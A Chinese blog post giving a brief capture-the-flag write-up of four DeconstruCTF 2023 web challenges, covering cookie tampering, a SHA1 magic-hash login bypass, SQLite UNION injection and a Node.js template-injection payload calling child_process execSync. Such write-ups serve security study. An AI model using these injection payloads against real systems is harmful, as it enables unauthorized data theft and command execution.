首页 > 其他分享 >Deconstructf-2023-WEB

Deconstructf-2023-WEB

时间:2023-08-06 14:33:37浏览次数:40  
标签:WEB base64 Deconstructf 源码 cookie 2023 password select

比赛比较简单,只做web,也是ak了。

where-are-the-cookies

 查看robots.txt

cookie是no的base64编码,改成yes的base64即可

 

 

why-are-types-weird

 password为  sha1('aaroZmOk') //0e66507019969427134894567494305185566735,sha1后开头是0通过若比较,登入进去

尝试注入,根据报错发现是sqlite,进行注入

-1 union select 1,2,(select sql from sqlite_master limit 0,1)--

-1 union select 1,2,(select group_concat(username,password) from power_users);

 

 

 

debugzero

 访问console,可以发现是flask

 一开始以为是伪造pin码,发现没有地方可以读取文件或者ssti。实际上是一开始的解码源码

打开css可以发现pin码。。。

 

 

 

gitcha

git泄露,拿到源码

注意到这里有渲染,尝试ssti

 checkAdmin直接改cookie绕过即可

注入

{{range.constructor("return global.process.mainModule.require('child_process').execSync('cat flag.txt')")()}}

 

 

 

 

 

 

 

 

 

 

 

 

标签:WEB,base64,Deconstructf,源码,cookie,2023,password,select
From: https://www.cnblogs.com/aninock/p/17609386.html

相关文章